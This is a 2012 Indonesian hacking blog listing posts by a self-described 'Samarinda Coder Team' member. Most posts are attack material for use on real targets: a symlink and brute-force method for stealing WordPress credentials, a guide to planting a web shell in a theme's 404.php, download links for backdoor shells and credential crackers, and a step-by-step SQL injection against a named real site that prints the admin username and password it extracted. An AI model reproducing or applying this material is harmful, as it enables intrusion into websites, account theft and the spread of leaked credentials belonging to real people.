Senin, 09 April 2012

3 symlink + brute force password wordpress

12.54 Under From hambransyah
[3 Comment]
ok di sini saya akan membahas tentang symlink yang marak nya sekarang hacking & defacer memakai cara ini
ok pertama anda sudah mempunyai shell yang sudah di tanam di website target
di sini saya buka hasil symlink saya :)
 dan di situ saya memilih salah 1 target jadi bila kalian sudah tanam shell symlink ini :)
dan sekarang saya klik button yang tulisan symlink
dan hasil nya seperti ini
dan sekarang klik pada gambar di atas klik tulisan wp-config.php
dan hasil nya seperti ini

tinggal kalian copas aja link nya :)
nah sekarang file yang brute sudah kita upload bersama di target tadi :)
sekarang buka tab buka file brute force kalian :)


nah paste kan link yang tadi ke link ini :D  hehehe kalau sudah tinggal klik submit aja tuh
nanti tampilan seperti ini


naah di gambar itu sudah ada tuh hehehe password nya + user nya jadi kita tinggal login aja tuh :)

untuk mendownload file nya ada di sini : klik here
maaf bila berantakan saya lagi ngantuk soal nya hehehe selamat mencoba jangan lupa komen nya :)
Read More »

Sabtu, 07 April 2012

1 Joomla Password Cracker PHP Script

19.14 Under From hambransyah
[1 Comment]
kali ini saya share tentang password cracker joomla
banyak sekali yang masih bingung dengan has joomla kali ini saya share deh :)
gimana sih cara nya
upload script ini di hostingan kalian

-Upload seluruh file index.php dan kamus.txt kedalam 1 folder
-Chmod :666 kamus.txt
-Jalankan script melalui index.php

download : klik here
script ini bisa di kembang kan asal jangan suka hapus credit :) kalau memang orang yang beretika :D
selamat mencoba di tunggu komen nya
Read More »

1 10 shell andalan

18.43 Under From hambransyah
[1 Comment]

assalamualaikum crew coder samarinda selamat pagi
kali ini saya dari salah satu team coder samarinda mau berbagi neh shell di dalam rar ini
keterangan sudah ada masing²
download shell : klik here
selamat mencoba jangan lupa komentar nya :)
Read More »

0 Order Domain Murah .com, .org, .net, .us, .info, .ca, .biz, .me, .uk, .asia

17.49 Under From hambransyah
[0 Comment]
selamat pagi teman :) kali ini dari salah satu teman kami yang bernama DoZa
menjual domain murah loh :)
contoh : com, .org, .net, .us, .info, .ca, .biz, .me, .uk, .asia  dll nya
Pastinya murah dan pelayanannya memuaskan
Berlaku untuk semua domain:
1 tahun = 50rb
2 tahun = 100rb
3 tahun = 150rb
Untuk perpanjang bisa kembali kesini lagi, yang pastinya saya tidak akan lari dari dunia maya. 7 tahun saya sudah beradu di dunia internet dan kali ini ingin menjalankan bisnis bersama teman saya.
lama pembuatan 1×24 jam
silahkan ceh di http://who.is/ sebelum order apakah domain terdaftar atau belum…
kami memudahkan pembayaran Anda, bisa melalui transfer pulsa / voucher telkomsel 50K. Alangkah baiknya jika Anda memiliki rekening, bisa langsung pembayaran melalui rekening. Order tanpa syarat apapun!!
googling aja dulu kak, cari dimana yang murah dan mudah pembayarannya selain di layanan kami ^_^
jika berminat, hubungi Doza Cracker
Oh iya, ini bukan domain gratisan, tapi domain berbayar
Berikut domain yang sudah order dengan kami (maaf, masih launching dan akan berkembang)
Read More »

1 Email dan Password YouPorn

17.31 Under From hambransyah
[1 Comment]





pingin punya id di situs youporn :D
yang pengen langsung aja ke sini : klik here
jangan lupa komen nya kawan :D
Read More »

0 Decoding eval gzinflate base64_decode

15.39 Under From hambransyah
[0 Comment]
temen-temen pasti bingung kan gimana decode tuh kode?
kali aja temen-temen mau ngecek apakah ada spykit di salah satu baris code tersebut, hehehe..

begini neh caranya..
syarat :
1. punya hosting
2. klo gak punya hosting, pake localhost aja kang

lanjutin deh..

pertama
- buat 3 file
1. dekrip.php
2. sumber.txt
3. hasil.txt (klo server sendiri, atur perm'a jadi 666)

ok tanpa banyak bacot deh :D iseng neh gue share beginian :D
buat file dekrip.php
ini code nya di sini : http://pastebin.com/nj6hTSSB

lalu edit sumber.txt dengan kode yang mau kamu edit, tapi hilangkan tanda² kerja php dulu (<? dan ?>)
ambil contoh diatas, nantinya menjadi
contoh  dalam sumber.txt :
eval(gzinflate(base64_decode(' FLAZERGANTENGKWKWKWKWKWKWKWNGIRIAJALU=')));

adapun untuk file hasil.txt itu kosongin aja, karena disitu nanti hasilnya
semoga berhasil
semoga berhasil ;)
Read More »

0 SQLI menggunakan handphone.

09.46 Under From hambransyah
[0 Comment]
mungkin ini aga terasa aneh, bahkan terasa asing untuk didengar.

Oke deh, lanjut....

Sebenernya, sqli menggunakan handphone ga ada bedanya ama sqli dengan menggunakan kompi.

yg menarik dari SQLI via handphone adalah tentang pesan error setelah melakukan pengujian terhadap situs target. Dimana, dengan menggunakan handphone biasanya pesan error tersebut akan terlihat lebih jelas dari pada menggunakan kompi...

O iya, ane lupa........ syarat untuk melakukan sqli menggunakan handphone, kita Harus punya handphone yang mendukung aplikasi opera mini 4.2

dork nya :  inurl:showcats.php?sbcat_id=

pada poc kali ini ane akan menggunakan dork yang diatas..

inget, smua dork google dgn handphone harus di awali dengan huruf kecil..

lanjut
http://www.top-domains.com/showcats.php?sbcat_id=1

http://www.top-domains.com/showcats.php?sbcat_id=1'

http://www.top-domains.com/showcats.php?sbcat_id=-1+order+by+5--

http://www.top-domains.com/showcats.php?sbcat_id=-1+union+select+1,2,3,4--

http://www.top-domains.com/showcats.php?sbcat_id=-1+union+select+1,version(),3,4--

http://www.top-domains.com/showcats.php?sbcat_id=-1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

http://www.top-domains.com/showcats.php?sbcat_id=-1+union+select+1,group_concat(username,0x3a,password),3,4+from+sblnk_admin--



username: admin
password: apa4773apa

maap, klo ane ga bisa ngejelesin prosesnya secara detail, karna mungkin masalah sqli smuanya udah pada tau...

O iya, hmmm....
Situs target di atas klo bisa jangan diganggu dulu yah....
Biar temen temen kita yang lainya yang masih blom tau masalah sqLI juga bisa belajar...
Read More »

1 cara upload shell di wordpress

09.39 Under From hambransyah
[1 Comment]
assalamualaikum kali ini saya dari team samarinda coder ingin berbagi neh
tentang cara upload shell di wordpress
pertama siap kan web yang sudah anda dapat password jadi tinggal login aja :D
pertama klik editor
tampilan seperti ini
kalau sudah kita ke next steep
cari template template seperti di atas dengan nama 404.php
kalau sudah nanti seperti gambar di atas
next stepp
masukan source code shell nya di sana
nantinggal klik update / save
ok lanjut
bila sudah tinggal panggil link nya saja
contoh : http://contoh-target.com/wp-content/themes/SolidStart/404.php
jadi dengan code : wp-content/themes/SolidStart/404.php <-- fungsi tempat shell yang kita upload tadi
ok sekian dulu dari saya 
dengan toturial cara upload shell salam kenal dengan team SCT [ Samarinda Coder Team ]
pingin punya shell SCT ??? download di sini : klik here
Read More »

0 tool Burp Scanner

08.57 Under From hambransyah
[0 Comment]
Tool ne cukup ampuh tuk scanner, sama halnya dengan tool acunetix
ONLY NEWBIE
download file : klik here
Read More »

0 Hexjector Version 1.0.7.3 Special Edition

08.51 Under From hambransyah
[0 Comment]
BI Version
walau pun ini tool jadul tapi work sampai sekarang loh mari di coba
 Versi Hexjector 1.0.7.3SE (2010/5/6)

Perubahan Terbuat dari rilis sebelumnya:
-Edisi Khusus
-Disclaimer ditambahkan.
-Hexjector Dokumentasi resmi untuk Win32 dirilis.
-MySQL Injeksi v5 Kendali Database Pencacahan (Ada beberapa bug di rilis terakhir
yang tetap dalam versi ini dan Data Diperoleh diperiksa satu per satu.).
-Persistent XSS yang ditambal oleh menyaring $ url2.
(Untuk Patch, Anda dapat menemukannya di Exploitdb atau email saya jika masih belum
diumumkan di exploitdb)
Html-Dump sementara dihapus karena 0day Vulnerablity ditemukan oleh saya.
-Video tentang 0day Eksploitasi dibuat dan upload di youtube.
-Non-Persistent XSS adalah patch.
-Lain non-persistent XSS adalah patch (Hexdumper).
-Yet Another Non-persistent XSS adalah patch (Hexafind).
Setiap masukan-disaring untuk mencegah XSS.
-Curl dimodifikasi untuk mengurangi Penggunaan Waktu Permintaan HTTP.
-Jenis Injection (Numeric, String Berdasarkan) ditambahkan.
-Perubahan dalam Query menurut Numeric atau String Berdasarkan Deteksi ditambahkan.
-Total Query Generated untuk Information_schema, phpmyadmin dan mysql 359.
-Kesalahan dalam Hexdumper tetap. (Wafdetect ($ dumpstr))
-Nama file telah modifed agar lebih profesional.
-Kesalahan dalam Kolom Count merupakan ditambal.
-Bersatu () ditambahkan.
-Error pada pencocokan kondisional adalah tetap. ($ Str_col = true)
-Sekarang saya akan fokus pada Injeksi MySQL v4.
-MySQL Injeksi v4 bersifat sementara dinonaktifkan karena aku tidak pernah disempurnakan kode sejak dibuat
dan itu adalah jenis kereta.
-Anda mungkin melihat beberapa memperlambat kinerja (Alasan terletak di Jl. Di bawah ini).
-Masalah pada jika ada terlalu banyak kolom, hanya sebagian dari data yang akan
diekstrak adalah patch.
-Interface berubah untuk membantu pengguna dalam mencari data yang diinginkan (Data dalam huruf tebal).
-SiXSS Ditambahkan.
-Custom Header ditambahkan.
-Server Informasi ditambahkan.
-Connect4.php diedit untuk membuat kesalahan lebih-bukti.
-Proses Hexafind, Hexoutfile dan Hexdumpfile telah diubah untuk
membuatnya lebih real-time.
-Hexoutfile (Ke OUTFILE) ditambahkan.
-New File Dibuat: hexoutfile.php
-Hexdumpfile (Ke DumpFile) ditambahkan.
-New File Dibuat: hexdumpfile.php
-Load_File ditambahkan.
-New File Dibuat: hexloader.php
-Custom Kembali Parameter ditambahkan.
-Update Periksa Modul ditambahkan.
Versi-Komentar ditambahkan.
-Sistem Operasi Deteksi ditambahkan.
-Sistem Operasi Arsitektur Deteksi ditambahkan.
Retrieval Direktori-Sementara Ditambahkan.

-New File ditambahkan: HexacURL.php
-HexacURL adalah sebuah penjelajah web berbasis Curl dengan Header Pencacahan untuk memudahkan Profesional Pentesters
untuk memecahkan masalah sql query.
-Non-persistent XSS diharapkan jika situs telah XSS.It lebih atau kurang seperti browser
jadi ini adalah normal.
-Testers dapat menggunakannya untuk mencari masukan parameter unik di Custom Parameter
dari Hexjector sehingga Hexjector dapat mengeksekusi.
-Custom menambahkan spasi.
-Untuk Heksadesimal ditambahkan.
-Url_encode ditambahkan.
-Url_decode ditambahkan.


download for :
windows : klik here
Unix : klik here
Read More »

2 [PHP] Facebook Login Checker v2.0

06.42 Under From hambransyah
[2 Comment]
nyubi mau ikutan share tools cupu nih.. ^_^
tools ini dibikin pertama kali ma Gblack & Slay3rz..
berhubung sekarang udah gak jalan lagi, aku coba buat benerin lagi biar tetep bisa jalan..

berikut hasil cource code nya : klik here

salam kenal dari rendi cyber samarinda coder team 
Read More »

0 tools XSS Scanner

06.29 Under From hambransyah
[0 Comment]

tools ini emang sudah lama sih walau pun jadul tapi tools andalan saya neh :P yang mau download aja
langsung di sini
download : klik here
Read More »

0 reiluke tools hacking

06.10 Under From hambransyah
[0 Comment]

heheheh siapa sih yang gak tau dengan tools ini :D lumayan buat aksi hacking kalian neh heheh
untung saya bukan heker :P kan cuman blogger yang berbagi :))
download tools : klik here
Read More »

0 List Crack password Online (tools)

06.02 Under From hambransyah
[0 Comment]
hehe iseng neh banyak orang yang bingun mau crack md5 gak tau link² nya kali ini sobat dari team samarinda coder memberikan list nya neh lumayan buat aksi hacking kalian :P
langsung aja yuk

Klik show untuk membuka gan
Hashkiller.com
plain-text.info
insidepro.com
md5decrypter.co.uk
c0llision.net
md5pass.info
hashcrack.com
generuj.pl
authsecu.com
md5decryption.com
md5.rednoize.com
md5decrypter.com
md5crack.com
gdataonline.com
passcracking.com
cmd5.com
schwett.com/md5
milw0rm.com/md5
md5this.com
tmto.org
hashchecker.com
kerinci.net
hash.db.hk
crackfor.me
md5-db.de
md5hood.com
neofusion.de
xmd5.cn
md5.shalla.de
md5.my-addr.com
hashcracking.info <-- API: https://hashcracking.info/check.php?hash= {hash} md5.opencracking.info
md5online.net
md5decrypter.co.uk

Read More »

0 [php]Koleksi script backdoor/web shell

05.56 Under From hambransyah
[0 Comment]
mau ngeshare shell ya biasa ane pake gan

*b374k
*r57
*locus
*predat0r
*global
*c99
*dark night
*dbscanweb
*devshell
*404
*scan

yang mau pake , bisa di donlot di bawah
download : klik here
Read More »

0 tools Winslet Corporation hacker tools

05.49 Under From hambransyah
[0 Comment]
tools yang ini bernama Winslet Corporation 
tools andalan saya :D lumayan buat iseng² tools ini menu di tools
[01]. Pengaturan Ip Address
[02]. Melihat PC di Network
[03]. Ping
[04]. Tracert
[05]. Sharing Folder
[06]. Telnet
[07]. FTP
[08]. Menssenger
[09]. Shutdown PC Lain
[10]. Konfigurasi User
[11]. CD/DVD Drive Setan
[12]. Remote Desktop
[13]. Hidden Folder
[14]. Tentang Programmer

cara kerja nya mudah saja koq tinggal masukan anggka saja yang kita mau :D
download tools : klik here


Read More »

0 paypal scanner cracker

05.06 Under From hambransyah
[0 Comment]
heheh iseng² neh tools dah lama di flashdisk dari pada banyak kuman nya wkwkw
mending gue share aja tools ini di sebut dengan : paypal scanner cracker
tools ini dapat dari forum sebelah udah lama banget tools nya sih :D
yuukk yang mau download : klik here
Read More »

0 About Me

04.25 Under From hambransyah
[0 Comment]
Selamat Datang Di Blog Mini saya
panggil saja saya hambran biasa saya di panggil flazer [ nama dunia maya ]
saya senang sekali dengan nama nya coder / coding
yang terutama saya lebih menyukai dengan program vb 6
saya memang suka dengan vb 6 karna program bisa membuat saya senang
saya dari team samarinda coder yang berdiri pada tahun 2005
walau pun kami tak punya situs tapi kami hanya mempunyai basecamp
umur saya baru 17 tahun saya terjun di dunia maya pada tahun 2008
di situ saya kenal dengan dunia maya kegiatan saya sehari² adalah belajar coding program & php
salam sejahtera salam damai :)


Read More »
Diberdayakan oleh Blogger.